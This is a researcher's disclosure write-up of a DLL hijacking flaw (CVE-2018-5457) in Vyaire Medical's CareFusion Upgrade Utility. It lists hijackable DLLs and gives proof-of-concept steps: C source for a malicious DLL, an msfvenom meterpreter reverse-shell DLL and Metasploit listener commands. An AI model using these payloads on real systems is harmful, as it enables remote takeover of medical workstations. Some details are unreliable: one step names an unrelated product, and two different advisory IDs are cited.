(CVE-2018-5457) Vyaire Medical CareFusion Upgrade Utility Vulnerability
Background:
On the 03rd August 2017 I discovered an Uncontrolled Search Path Element (CWE-427) vulnerability in Vyaire Medical’s CareFusion Upgrade Utility software. This vulnerability can be exploited by placing a crafted DLL file in the search path which is loaded prior to a valid DLL, allowing an attacker to hijack the DLL and execute arbitrary code on the targeted system.
Vyaire Medical’s CareFusion Upgrade Utility 2.0.2.2 is an upgrade utility designed to upgrade firmware on MicroLoop, MicroLoop MK8, MicroLab, MicroLab MK8, and SpiroUSB range of CareFusion Units.
Coordinated disclosure regarding the identified vulnerability was undertaken with Vyaire Medical and The US Department of Homeland Security’s ICS-CERT. ICS-CERT have published the findings under Advisory ICSMA-18-037-01, and allocated CVE-ID CVE-2018-5457.
The Department of Homeland Security’s ICS-CERT advisory (ICSMA-17-304-02) can be found here.
In response to the coordinated disclosure activities, Vyaire Medical have released version 2.0.3.0 to address the vulnerability. The new version of software can be found here.
Uncontrolled Search Path Element (CVE-2018-5457 | CVSS v3 6.7)
Details
Vulnerable versions of the Vyaire Medical’s CareFusion Update Utility software use an uncontrolled search path when loading resources. An attacker may leverage this vulnerability by crafting a DLL file and copying the file to a specified location on the target system.
The CareFusion Upgrade Utility 2.0.2.2 software is vulnerable to two separate DLL hijacking vulnerability conditions.
# DLL Hijacking upon application launch
The vulnerable version of CareFusion Upgrade Utility 2.0.2.2 software is able to be exploited by an attacker upon application launch by placing crafted DLLs into the same directory location as the executable shortcut which references the application executables. An attacker with local access to the target system can create their own shortcut to the application binary and perform DLL hijacking from this uncontrolled path.
# DLL Hijacking on product installation.
CareFusion provides a windows installer package for the CareFusion Upgrade Utility 2.0.2.2 software and associated utilities. An attacker with access to the location where the victim has stored the downloaded installer can place crafted DLLs in the search path, resulting in DLL hijacking and execution of arbitrary code on the targeted system when the product is initially installed.
====================
Vulnerable DLLs
====================
The following DLLs have been individually tested and can be hijacked when the vulnerable version of CareFusion Upgrade Utility 2.0.2.2 software and utilities are launched:
– aspnet_counters.dll
– bitsperf.dll
– mscoree.dll
– msdtcuiu.dll
– netfxperf.dll
– perfts.dll
– rasctrs.dll
– secur32.dll
– tapiperf.dll
The following DLLs have been individually tested and can be hijacked when a user initially installs the vulnerable version of CareFusion Upgrade Utility 2.0.2.2 software:
– cryptsp.dll
– dwmapi.dll
– ntmarta.dll
– propsys.dll
– riched32.dll
– rpcrtremote.dll
– secur32.dll
– sxs.dll
====================
Exploit difficulty
====================
An attacker must have low privileged authenticated access to the local target system in order to exploit this vulnerability, or have the ability to social engineer the user in order to accept the malformed DLL file. An attacker can use well known and existing exploit techniques to gain access to the target system with the same privilege rights as the user running the program.
====================
Proof of Concept
====================
#–
# MessageBox PoC
#–
This PoC will display a message box when the crafted DLL is loaded by the application.
1. Create a file called riched32.c with the following content:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
#include <windows.h> BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_exploit(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_exploit() { MessageBox(0, "Success DLL Hijack", "Vulnerable", MB_OK); } |
2. Compile as a DLL with the following command on a linux host:
|
1 |
> i686-w64-mingw32-gcc riched32.c -o riched32.dll -shared |
3. Copy the DLL file to the same location as the application executable and observe the DLL Hijack message box popup when launching vulnerable versions of Trihedral Engineering Limited’s VTScada software.
#–
# Reverse shell PoC
#–
This PoC will result in a reverse shell connection to the target host. The attacker will inherit the same permissions as the victim user.
1. Create a DLL with a meterpreter Reverse TCP payload.
|
1 |
> msfvenom -p windows/meterpreter/reverse_tcp --platform windows -f dll LHOST=<ipaddr> LPORT=<port> > riched32.dll |
2. Create a listener for the reverse shell in metasploit:
|
1 2 3 4 5 |
msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set lhost <ipaddr> msf > set lport <port> msf > exploit |
3. With the listener ready to receive the reverse shell, copy the DLL file to the same location as the application executable and observe a reverse shell connection from the target system to the attacking host when launching vulnerable version of the software.